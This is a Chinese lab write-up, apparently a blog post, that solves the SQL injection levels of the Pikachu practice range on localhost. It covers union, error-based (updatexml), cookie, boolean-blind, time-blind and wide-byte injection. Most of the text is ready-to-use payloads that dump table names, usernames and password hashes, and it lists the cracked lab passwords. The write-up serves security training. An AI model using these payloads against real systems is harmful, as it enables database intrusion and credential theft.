1.post型
抓包,修改id
发现为数字型
order by 为 2
爆库:
id=-1 union select 1,database()
爆表:
id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')
爆列:
id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')
爆密码,账号:
id=-1 union select (select group_concat(username) from users),(select group_concat(password) from users)
账号:
admin,pikachu,test
密码:(前面为md5)
e10adc3949ba59abbe56e057f20f883e(123456)
670b14728ad9902aecba32e22fa4f6bd(000000)
e99a18c428cb38d5f260853678922e03(abc123)
2.get型
发现为 ' 闭合
order by 爆出2列
union联合注入:
?name=0%27%20union%20select%201,database()%20--+&submit=%E6%9F%A5%E8%AF%A2
?name=0%27%20union%20select%201,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')%20--+&submit=%E6%9F%A5%E8%AF%A2
?name=0%27%20union%20select%201,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')%20--+&submit=%E6%9F%A5%E8%AF%A2
?name=0' union select (select group_concat(username) from users),(select group_concat(password) from users)--+&submit=%E6%9F%A5
3.搜索型
随便输入点东西,搜索
发现url上有变化,可能可以注入
'报错,'--+正常
'闭合
order by 爆出三列
union联合注入
http://127.0.0.1/pikachu/vul/sqli/sqli_search.php?name=-1%27%20union%20select%201,2,database()--+&submit=%E6%90%9C%E7%B4%A2
其他跟 2 get型 一模一样
4.xx型
发现闭合 为 ')
order by 爆出2列
union联合注入:
http://127.0.0.1/pikachu/vul/sqli/sqli_x.php?name=0%27)%20union%20select%201,database()--+&submit=%E6%9F%A5%E8%AF%A2
其他跟之前一样
5.insert/update 型
我们先注册一个,用户名为Sun的
点击submit时抓包
修改username值
发现 ' 报错
'and'1页面正常
为'闭合
有报错,试试报错盲注payload
username=Sun' and(updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1))or'1
拿到数据库
username=Sun' and(updatexml(1,concat(0x5e,(substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1)),0x5e),1))or'1
拿到全部表
接下来就修改语句就完事了
6.delete型
是个留言板,随便输入什么
抓包,看下闭合会不会报错
试了贼多种可能,没有问题
试试删除,在删除的时候,抓包
发现Get那行,有id值,怀疑可以注入
(因为为get型,记得url编码)!!!!!!!
输入 and 1=1.发现正常删了
(因为为get型,记得url编码)!!!!!!!
输入 and 1=2,提示数据库有问题??
(因为为get型,记得url编码)!!!!!!!
竟然不一样就可以确定为数字型吧
试试报错盲注入payload
and(updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1))
(因为为get型,记得url编码)!!!!!!!
发现可以爆出
接下来就是老套路了。。。
7.http头型
提示我门admin,123456登录
登录看看
发现回显了user-agent
估计这里存在注入
退出重登抓包
先试试cookie注入
在第二个包里,
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=siat3mvapl8agm462s7762bo83
试试修改
ant[uname]=admin',发现报错
ant[uname]=admin'--+,发现页面改变
看来是'闭合
直接上payload
ant[uname]=admin'and(updatexml(1,concat(0x5e,(substr((database()),1)),0x5e),1))--+
报错库名
8. 基于get型的bool盲注
基于get型的bool盲注
网上看了好像就kobe用户存在的
发现kobe' and 1=1#
正常
试试bool
kobe' and length(database())=1# 页面不对
kobe' and length(database())>1# 页面正常,看来确实有bool盲注,接下来用自写脚本跑,或者sqlmap吧
9.基于get型的时间盲注
url:
http://127.0.0.1/pikachu/vul/sqli/sqli_blind_t.php?name=admin%27%20#&submit=%E6%9F%A5%E8%AF%A2
页面正常,可以是'闭合,#注释符
http://127.0.0.1/pikachu/vul/sqli/sqli_blind_t.php?name=admin%27and sleep(7)#&submit=%E6%9F%A5%E8%AF%A2
发现页面延迟,确实有时间注入
接下来脚本或者sqlmap跑
10.宽字节型
输入kobe,正常返回
url没东西,可以判断为post,抓包看看
输入
%df',报错
%df'# 正常
说明为宽字节注入
输入 order by 发现为2列
name=-kobe%df'union select 1,2#
爆出了1,2回显
接下来老套路了
爆库:
name=-kobe%df'union select 1,database()#
爆表:
name=-kobe%df'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x70696B61636875)# 把 pikachu 用16进制编码,前面加上0x
爆列:
name=-kobe%df'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=0x70696B61636875 and table_name=0x7573657273)#
接下来老套路....
2984
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
